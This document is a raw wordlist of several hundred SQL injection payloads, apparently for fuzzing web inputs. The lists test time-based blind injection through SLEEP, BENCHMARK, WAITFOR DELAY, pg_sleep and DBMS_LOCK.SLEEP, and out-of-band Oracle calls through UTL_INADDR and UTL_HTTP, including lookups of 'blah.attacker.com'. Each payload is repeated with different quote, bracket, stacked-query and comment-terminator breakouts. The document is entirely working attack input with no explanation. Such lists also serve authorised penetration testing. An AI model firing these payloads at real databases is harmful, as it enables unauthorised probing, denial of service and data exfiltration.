+BENCHMARK(1000000,MD5(‘A’))
+SLEEP(5)
+WAITFOR DELAY '00:00:20'
+pg_sleep(10)
+UTL_INADDR.get_host_name(’10.0.0.1′)
+UTL_INADDR.get_host_address(‘blah.attacker.com’)
+UTL_HTTP.REQUEST(‘http://google.com’)
+BENCHMARK(1000000,MD5(‘A’))   -- 
+BENCHMARK(1000000,MD5(‘A’))  /* 
+BENCHMARK(1000000,MD5(‘A’)))   -- 
+BENCHMARK(1000000,MD5(‘A’)))  /* 
+BENCHMARK(1000000,MD5(‘A’))))   -- 
+BENCHMARK(1000000,MD5(‘A’))))  /* 
+BENCHMARK(1000000,MD5(‘A’)))))  -- 
+BENCHMARK(1000000,MD5(‘A’))))) /* 
+SLEEP(5)   -- 
+SLEEP(5)  /* 
+SLEEP(5))   -- 
+SLEEP(5))  /* 
+SLEEP(5)))   -- 
+SLEEP(5)))  /* 
+SLEEP(5))))  -- 
+SLEEP(5)))) /* 
+WAITFOR DELAY '00:00:20'   -- 
+WAITFOR DELAY '00:00:20'  /* 
+WAITFOR DELAY '00:00:20')   -- 
+WAITFOR DELAY '00:00:20')  /* 
+WAITFOR DELAY '00:00:20'))   -- 
+WAITFOR DELAY '00:00:20'))  /* 
+WAITFOR DELAY '00:00:20')))  -- 
+WAITFOR DELAY '00:00:20'))) /* 
+pg_sleep(10)   -- 
+pg_sleep(10)  /* 
+pg_sleep(10))   -- 
+pg_sleep(10))  /* 
+pg_sleep(10)))   -- 
+pg_sleep(10)))  /* 
+pg_sleep(10))))  -- 
+pg_sleep(10)))) /* 
+UTL_INADDR.get_host_name(’10.0.0.1′)   -- 
+UTL_INADDR.get_host_name(’10.0.0.1′)  /* 
+UTL_INADDR.get_host_name(’10.0.0.1′))   -- 
+UTL_INADDR.get_host_name(’10.0.0.1′))  /* 
+UTL_INADDR.get_host_name(’10.0.0.1′)))   -- 
+UTL_INADDR.get_host_name(’10.0.0.1′)))  /* 
+UTL_INADDR.get_host_name(’10.0.0.1′))))  -- 
+UTL_INADDR.get_host_name(’10.0.0.1′)))) /* 
+UTL_INADDR.get_host_address(‘blah.attacker.com’)   -- 
+UTL_INADDR.get_host_address(‘blah.attacker.com’)  /* 
+UTL_INADDR.get_host_address(‘blah.attacker.com’))   -- 
+UTL_INADDR.get_host_address(‘blah.attacker.com’))  /* 
+UTL_INADDR.get_host_address(‘blah.attacker.com’)))   -- 
+UTL_INADDR.get_host_address(‘blah.attacker.com’)))  /* 
+UTL_INADDR.get_host_address(‘blah.attacker.com’))))  -- 
+UTL_INADDR.get_host_address(‘blah.attacker.com’)))) /* 
+UTL_HTTP.REQUEST(‘http://google.com’)   -- 
+UTL_HTTP.REQUEST(‘http://google.com’)  /* 
+UTL_HTTP.REQUEST(‘http://google.com’))   -- 
+UTL_HTTP.REQUEST(‘http://google.com’))  /* 
+UTL_HTTP.REQUEST(‘http://google.com’)))   -- 
+UTL_HTTP.REQUEST(‘http://google.com’)))  /* 
+UTL_HTTP.REQUEST(‘http://google.com’))))  -- 
+UTL_HTTP.REQUEST(‘http://google.com’)))) /* 
'+BENCHMARK(1000000,MD5(‘A’))+'a
'+SLEEP(5)+'a
'+WAITFOR DELAY '00:00:20'+'a
'+pg_sleep(10)+'a
'+UTL_INADDR.get_host_name(’10.0.0.1′)+'a
'+UTL_INADDR.get_host_address(‘blah.attacker.com’)+'a
'+UTL_HTTP.REQUEST(‘http://google.com’)+'a
'+BENCHMARK(1000000,MD5(‘A’))   -- 
'+BENCHMARK(1000000,MD5(‘A’))  /* 
'+BENCHMARK(1000000,MD5(‘A’)))   -- 
'+BENCHMARK(1000000,MD5(‘A’)))  /* 
'+BENCHMARK(1000000,MD5(‘A’))))   -- 
'+BENCHMARK(1000000,MD5(‘A’))))  /* 
'+BENCHMARK(1000000,MD5(‘A’)))))  -- 
'+BENCHMARK(1000000,MD5(‘A’))))) /* 
'+SLEEP(5)   -- 
'+SLEEP(5)  /* 
'+SLEEP(5))   -- 
'+SLEEP(5))  /* 
'+SLEEP(5)))   -- 
'+SLEEP(5)))  /* 
'+SLEEP(5))))  -- 
'+SLEEP(5)))) /* 
'+WAITFOR DELAY '00:00:20'   -- 
'+WAITFOR DELAY '00:00:20'  /* 
'+WAITFOR DELAY '00:00:20')   -- 
'+WAITFOR DELAY '00:00:20')  /* 
'+WAITFOR DELAY '00:00:20'))   -- 
'+WAITFOR DELAY '00:00:20'))  /* 
'+WAITFOR DELAY '00:00:20')))  -- 
'+WAITFOR DELAY '00:00:20'))) /* 
'+pg_sleep(10)   -- 
'+pg_sleep(10)  /* 
'+pg_sleep(10))   -- 
'+pg_sleep(10))  /* 
'+pg_sleep(10)))   -- 
'+pg_sleep(10)))  /* 
'+pg_sleep(10))))  -- 
'+pg_sleep(10)))) /* 
'+UTL_INADDR.get_host_name(’10.0.0.1′)   -- 
'+UTL_INADDR.get_host_name(’10.0.0.1′)  /* 
'+UTL_INADDR.get_host_name(’10.0.0.1′))   -- 
'+UTL_INADDR.get_host_name(’10.0.0.1′))  /* 
'+UTL_INADDR.get_host_name(’10.0.0.1′)))   -- 
'+UTL_INADDR.get_host_name(’10.0.0.1′)))  /* 
'+UTL_INADDR.get_host_name(’10.0.0.1′))))  -- 
'+UTL_INADDR.get_host_name(’10.0.0.1′)))) /* 
'+UTL_INADDR.get_host_address(‘blah.attacker.com’)   -- 
'+UTL_INADDR.get_host_address(‘blah.attacker.com’)  /* 
'+UTL_INADDR.get_host_address(‘blah.attacker.com’))   -- 
'+UTL_INADDR.get_host_address(‘blah.attacker.com’))  /* 
'+UTL_INADDR.get_host_address(‘blah.attacker.com’)))   -- 
'+UTL_INADDR.get_host_address(‘blah.attacker.com’)))  /* 
'+UTL_INADDR.get_host_address(‘blah.attacker.com’))))  -- 
'+UTL_INADDR.get_host_address(‘blah.attacker.com’)))) /* 
'+UTL_HTTP.REQUEST(‘http://google.com’)   -- 
'+UTL_HTTP.REQUEST(‘http://google.com’)  /* 
'+UTL_HTTP.REQUEST(‘http://google.com’))   -- 
'+UTL_HTTP.REQUEST(‘http://google.com’))  /* 
'+UTL_HTTP.REQUEST(‘http://google.com’)))   -- 
'+UTL_HTTP.REQUEST(‘http://google.com’)))  /* 
'+UTL_HTTP.REQUEST(‘http://google.com’))))  -- 
'+UTL_HTTP.REQUEST(‘http://google.com’)))) /* 
(BENCHMARK(1000000,MD5(‘A’)))
(SLEEP(5))
(WAITFOR DELAY '00:00:20')
(pg_sleep(10))
(UTL_INADDR.get_host_name(’10.0.0.1′))
(UTL_INADDR.get_host_address(‘blah.attacker.com’))
(UTL_HTTP.REQUEST(‘http://google.com’))
(BENCHMARK(1000000,MD5(‘A’)))   -- 
(BENCHMARK(1000000,MD5(‘A’)))  /* 
(BENCHMARK(1000000,MD5(‘A’))))   -- 
(BENCHMARK(1000000,MD5(‘A’))))  /* 
(BENCHMARK(1000000,MD5(‘A’)))))   -- 
(BENCHMARK(1000000,MD5(‘A’)))))  /* 
(BENCHMARK(1000000,MD5(‘A’))))))  -- 
(BENCHMARK(1000000,MD5(‘A’)))))) /* 
(SLEEP(5))   -- 
(SLEEP(5))  /* 
(SLEEP(5)))   -- 
(SLEEP(5)))  /* 
(SLEEP(5))))   -- 
(SLEEP(5))))  /* 
(SLEEP(5)))))  -- 
(SLEEP(5))))) /* 
(WAITFOR DELAY '00:00:20')   -- 
(WAITFOR DELAY '00:00:20')  /* 
(WAITFOR DELAY '00:00:20'))   -- 
(WAITFOR DELAY '00:00:20'))  /* 
(WAITFOR DELAY '00:00:20')))   -- 
(WAITFOR DELAY '00:00:20')))  /* 
(WAITFOR DELAY '00:00:20'))))  -- 
(WAITFOR DELAY '00:00:20')))) /* 
(pg_sleep(10))   -- 
(pg_sleep(10))  /* 
(pg_sleep(10)))   -- 
(pg_sleep(10)))  /* 
(pg_sleep(10))))   -- 
(pg_sleep(10))))  /* 
(pg_sleep(10)))))  -- 
(pg_sleep(10))))) /* 
(UTL_INADDR.get_host_name(’10.0.0.1′))   -- 
(UTL_INADDR.get_host_name(’10.0.0.1′))  /* 
(UTL_INADDR.get_host_name(’10.0.0.1′)))   -- 
(UTL_INADDR.get_host_name(’10.0.0.1′)))  /* 
(UTL_INADDR.get_host_name(’10.0.0.1′))))   -- 
(UTL_INADDR.get_host_name(’10.0.0.1′))))  /* 
(UTL_INADDR.get_host_name(’10.0.0.1′)))))  -- 
(UTL_INADDR.get_host_name(’10.0.0.1′))))) /* 
(UTL_INADDR.get_host_address(‘blah.attacker.com’))   -- 
(UTL_INADDR.get_host_address(‘blah.attacker.com’))  /* 
(UTL_INADDR.get_host_address(‘blah.attacker.com’)))   -- 
(UTL_INADDR.get_host_address(‘blah.attacker.com’)))  /* 
(UTL_INADDR.get_host_address(‘blah.attacker.com’))))   -- 
(UTL_INADDR.get_host_address(‘blah.attacker.com’))))  /* 
(UTL_INADDR.get_host_address(‘blah.attacker.com’)))))  -- 
(UTL_INADDR.get_host_address(‘blah.attacker.com’))))) /* 
(UTL_HTTP.REQUEST(‘http://google.com’))   -- 
(UTL_HTTP.REQUEST(‘http://google.com’))  /* 
(UTL_HTTP.REQUEST(‘http://google.com’)))   -- 
(UTL_HTTP.REQUEST(‘http://google.com’)))  /* 
(UTL_HTTP.REQUEST(‘http://google.com’))))   -- 
(UTL_HTTP.REQUEST(‘http://google.com’))))  /* 
(UTL_HTTP.REQUEST(‘http://google.com’)))))  -- 
(UTL_HTTP.REQUEST(‘http://google.com’))))) /* 
 ; BEGIN DBMS_LOCK.SLEEP(5); END;;  -- 
 ; BEGIN DBMS_LOCK.SLEEP(5); END;; /* 
 ; WAITFOR DELAY '00:00:20';  -- 
 ; WAITFOR DELAY '00:00:20'; /* 
 ; select BENCHMARK(1000000,MD5(‘A’));  -- 
 ; select BENCHMARK(1000000,MD5(‘A’)); /* 
 ; select SLEEP(5);  -- 
 ; select SLEEP(5); /* 
 ; select WAITFOR DELAY '00:00:20';  -- 
 ; select WAITFOR DELAY '00:00:20'; /* 
 ; select pg_sleep(10);  -- 
 ; select pg_sleep(10); /* 
 ; select UTL_INADDR.get_host_name(’10.0.0.1′) from dual;  -- 
 ; select UTL_INADDR.get_host_name(’10.0.0.1′) from dual; /* 
 ; select UTL_INADDR.get_host_address(‘blah.attacker.com’) from dual;  -- 
 ; select UTL_INADDR.get_host_address(‘blah.attacker.com’) from dual; /* 
 ; select UTL_HTTP.REQUEST(‘http://google.com’) from dual;  -- 
 ; select UTL_HTTP.REQUEST(‘http://google.com’) from dual; /* 
) ; BEGIN DBMS_LOCK.SLEEP(5); END;;  -- 
) ; BEGIN DBMS_LOCK.SLEEP(5); END;; /* 
) ; WAITFOR DELAY '00:00:20';  -- 
) ; WAITFOR DELAY '00:00:20'; /* 
) ; select BENCHMARK(1000000,MD5(‘A’));  -- 
) ; select BENCHMARK(1000000,MD5(‘A’)); /* 
) ; select SLEEP(5);  -- 
) ; select SLEEP(5); /* 
) ; select WAITFOR DELAY '00:00:20';  -- 
) ; select WAITFOR DELAY '00:00:20'; /* 
) ; select pg_sleep(10);  -- 
) ; select pg_sleep(10); /* 
) ; select UTL_INADDR.get_host_name(’10.0.0.1′) from dual;  -- 
) ; select UTL_INADDR.get_host_name(’10.0.0.1′) from dual; /* 
) ; select UTL_INADDR.get_host_address(‘blah.attacker.com’) from dual;  -- 
) ; select UTL_INADDR.get_host_address(‘blah.attacker.com’) from dual; /* 
) ; select UTL_HTTP.REQUEST(‘http://google.com’) from dual;  -- 
) ; select UTL_HTTP.REQUEST(‘http://google.com’) from dual; /* 
)) ; BEGIN DBMS_LOCK.SLEEP(5); END;;  -- 
)) ; BEGIN DBMS_LOCK.SLEEP(5); END;; /* 
)) ; WAITFOR DELAY '00:00:20';  -- 
)) ; WAITFOR DELAY '00:00:20'; /* 
)) ; select BENCHMARK(1000000,MD5(‘A’));  -- 
)) ; select BENCHMARK(1000000,MD5(‘A’)); /* 
)) ; select SLEEP(5);  -- 
)) ; select SLEEP(5); /* 
)) ; select WAITFOR DELAY '00:00:20';  -- 
)) ; select WAITFOR DELAY '00:00:20'; /* 
)) ; select pg_sleep(10);  -- 
)) ; select pg_sleep(10); /* 
)) ; select UTL_INADDR.get_host_name(’10.0.0.1′) from dual;  -- 
)) ; select UTL_INADDR.get_host_name(’10.0.0.1′) from dual; /* 
)) ; select UTL_INADDR.get_host_address(‘blah.attacker.com’) from dual;  -- 
)) ; select UTL_INADDR.get_host_address(‘blah.attacker.com’) from dual; /* 
)) ; select UTL_HTTP.REQUEST(‘http://google.com’) from dual;  -- 
)) ; select UTL_HTTP.REQUEST(‘http://google.com’) from dual; /* 
))); BEGIN DBMS_LOCK.SLEEP(5); END;;  -- 
))); BEGIN DBMS_LOCK.SLEEP(5); END;; /* 
))); WAITFOR DELAY '00:00:20';  -- 
))); WAITFOR DELAY '00:00:20'; /* 
))); select BENCHMARK(1000000,MD5(‘A’));  -- 
))); select BENCHMARK(1000000,MD5(‘A’)); /* 
))); select SLEEP(5);  -- 
))); select SLEEP(5); /* 
))); select WAITFOR DELAY '00:00:20';  -- 
))); select WAITFOR DELAY '00:00:20'; /* 
))); select pg_sleep(10);  -- 
))); select pg_sleep(10); /* 
))); select UTL_INADDR.get_host_name(’10.0.0.1′) from dual;  -- 
))); select UTL_INADDR.get_host_name(’10.0.0.1′) from dual; /* 
))); select UTL_INADDR.get_host_address(‘blah.attacker.com’) from dual;  -- 
))); select UTL_INADDR.get_host_address(‘blah.attacker.com’) from dual; /* 
))); select UTL_HTTP.REQUEST(‘http://google.com’) from dual;  -- 
))); select UTL_HTTP.REQUEST(‘http://google.com’) from dual; /* 
' ; BEGIN DBMS_LOCK.SLEEP(5); END;;  -- 
' ; BEGIN DBMS_LOCK.SLEEP(5); END;; /* 
' ; WAITFOR DELAY '00:00:20';  -- 
' ; WAITFOR DELAY '00:00:20'; /* 
' ; select BENCHMARK(1000000,MD5(‘A’));  -- 
' ; select BENCHMARK(1000000,MD5(‘A’)); /* 
' ; select SLEEP(5);  -- 
' ; select SLEEP(5); /* 
' ; select WAITFOR DELAY '00:00:20';  -- 
' ; select WAITFOR DELAY '00:00:20'; /* 
' ; select pg_sleep(10);  -- 
' ; select pg_sleep(10); /* 
' ; select UTL_INADDR.get_host_name(’10.0.0.1′) from dual;  -- 
' ; select UTL_INADDR.get_host_name(’10.0.0.1′) from dual; /* 
' ; select UTL_INADDR.get_host_address(‘blah.attacker.com’) from dual;  -- 
' ; select UTL_INADDR.get_host_address(‘blah.attacker.com’) from dual; /* 
' ; select UTL_HTTP.REQUEST(‘http://google.com’) from dual;  -- 
' ; select UTL_HTTP.REQUEST(‘http://google.com’) from dual; /* 
') ; BEGIN DBMS_LOCK.SLEEP(5); END;;  -- 
') ; BEGIN DBMS_LOCK.SLEEP(5); END;; /* 
') ; WAITFOR DELAY '00:00:20';  -- 
') ; WAITFOR DELAY '00:00:20'; /* 
') ; select BENCHMARK(1000000,MD5(‘A’));  -- 
') ; select BENCHMARK(1000000,MD5(‘A’)); /* 
') ; select SLEEP(5);  -- 
') ; select SLEEP(5); /* 
') ; select WAITFOR DELAY '00:00:20';  -- 
') ; select WAITFOR DELAY '00:00:20'; /* 
') ; select pg_sleep(10);  -- 
') ; select pg_sleep(10); /* 
') ; select UTL_INADDR.get_host_name(’10.0.0.1′) from dual;  -- 
') ; select UTL_INADDR.get_host_name(’10.0.0.1′) from dual; /* 
') ; select UTL_INADDR.get_host_address(‘blah.attacker.com’) from dual;  -- 
') ; select UTL_INADDR.get_host_address(‘blah.attacker.com’) from dual; /* 
') ; select UTL_HTTP.REQUEST(‘http://google.com’) from dual;  -- 
') ; select UTL_HTTP.REQUEST(‘http://google.com’) from dual; /* 
')) ; BEGIN DBMS_LOCK.SLEEP(5); END;;  -- 
')) ; BEGIN DBMS_LOCK.SLEEP(5); END;; /* 
')) ; WAITFOR DELAY '00:00:20';  -- 
')) ; WAITFOR DELAY '00:00:20'; /* 
')) ; select BENCHMARK(1000000,MD5(‘A’));  -- 
')) ; select BENCHMARK(1000000,MD5(‘A’)); /* 
')) ; select SLEEP(5);  -- 
')) ; select SLEEP(5); /* 
')) ; select WAITFOR DELAY '00:00:20';  -- 
')) ; select WAITFOR DELAY '00:00:20'; /* 
')) ; select pg_sleep(10);  -- 
')) ; select pg_sleep(10); /* 
')) ; select UTL_INADDR.get_host_name(’10.0.0.1′) from dual;  -- 
')) ; select UTL_INADDR.get_host_name(’10.0.0.1′) from dual; /* 
')) ; select UTL_INADDR.get_host_address(‘blah.attacker.com’) from dual;  -- 
')) ; select UTL_INADDR.get_host_address(‘blah.attacker.com’) from dual; /* 
')) ; select UTL_HTTP.REQUEST(‘http://google.com’) from dual;  -- 
')) ; select UTL_HTTP.REQUEST(‘http://google.com’) from dual; /* 
'))); BEGIN DBMS_LOCK.SLEEP(5); END;;  -- 
'))); BEGIN DBMS_LOCK.SLEEP(5); END;; /* 
'))); WAITFOR DELAY '00:00:20';  -- 
'))); WAITFOR DELAY '00:00:20'; /* 
'))); select BENCHMARK(1000000,MD5(‘A’));  -- 
'))); select BENCHMARK(1000000,MD5(‘A’)); /* 
'))); select SLEEP(5);  -- 
'))); select SLEEP(5); /* 
'))); select WAITFOR DELAY '00:00:20';  -- 
'))); select WAITFOR DELAY '00:00:20'; /* 
'))); select pg_sleep(10);  -- 
'))); select pg_sleep(10); /* 
'))); select UTL_INADDR.get_host_name(’10.0.0.1′) from dual;  -- 
'))); select UTL_INADDR.get_host_name(’10.0.0.1′) from dual; /* 
'))); select UTL_INADDR.get_host_address(‘blah.attacker.com’) from dual;  -- 
'))); select UTL_INADDR.get_host_address(‘blah.attacker.com’) from dual; /* 
'))); select UTL_HTTP.REQUEST(‘http://google.com’) from dual;  -- 
'))); select UTL_HTTP.REQUEST(‘http://google.com’) from dual; /* 